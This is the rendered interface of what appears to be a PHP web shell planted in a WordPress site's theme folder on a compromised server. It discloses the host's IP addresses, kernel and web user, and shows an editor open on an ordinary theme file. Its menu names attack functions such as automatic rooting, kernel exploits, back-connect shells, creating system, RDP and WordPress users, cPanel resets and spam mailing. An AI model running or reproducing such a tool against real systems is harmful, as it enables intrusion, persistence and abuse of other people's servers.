Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 18.225.117.89
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-content /
themes /
hello-academy /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
404.php
11.86
KB
-rwxrwxrwx
LICENSE
17.79
KB
-rwxrwxrwx
archive.php
1.54
KB
-rwxrwxrwx
comments.php
1.51
KB
-rwxrwxrwx
footer.php
866
B
-rwxrwxrwx
functions.php
1.06
KB
-rwxrwxrwx
header.php
2.92
KB
-rwxrwxrwx
index.php
1.21
KB
-rwxrwxrwx
page.php
656
B
-rwxrwxrwx
readme.txt
4.31
KB
-rwxrwxrwx
screenshot.png
285.67
KB
-rwxrwxrwx
search.php
1.48
KB
-rwxrwxrwx
sidebar.php
378
B
-rwxrwxrwx
single.php
1.48
KB
-rwxrwxrwx
style.css
12.96
KB
-rwxrwxrwx
woocommerce.php
378
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php /** * The template for displaying 404 pages (not found). * * @package HelloAcademy */ /** * Exit if accessed directly */ if ( ! defined( 'ABSPATH' ) ) { exit; } get_header(); $sidebar = HelloAcademy\get_customizer_settings( 'blog_sidebar_position', 'none' ); ?> <main class="hello-academy-content" role="main" id="content"> <div class="academy-container"> <div class="academy-row"> <?php if ( ( 'sidebar-left' === $sidebar ) ) : ?> <?php get_sidebar(); ?> <?php endif; ?> <div class="<?php echo apply_filters( 'helloacademy/template/entry_content_wrap_classname', 'academy-col-lg-12', $sidebar ); ?>"> <?php if ( apply_filters( 'helloacademy/templates/page_title', true ) ) : ?> <header class="entry-header"> <?php the_archive_title( '<h1 class="entry-title">', '</h1>' ); the_archive_description( '<p class="archive-description">', '</p>' ); ?> </header> <?php endif; ?> <div class="entry-content"> <div class="academy-row"> <?php do_action( 'helloacademy/template/before_loop' ); if ( have_posts() ) : while ( have_posts() ) : the_post(); get_template_part( 'template-parts/content' ); endwhile; else : get_template_part( 'template-parts/content', 'none' ); endif; do_action( 'helloacademy/template/after_loop' ); ?> </div> </div> </div> <?php if ( ( 'sidebar-right' === $sidebar ) ) : ?> <?php get_sidebar(); ?> <?php endif; ?> </div> </div> </main> <?php get_footer();
Close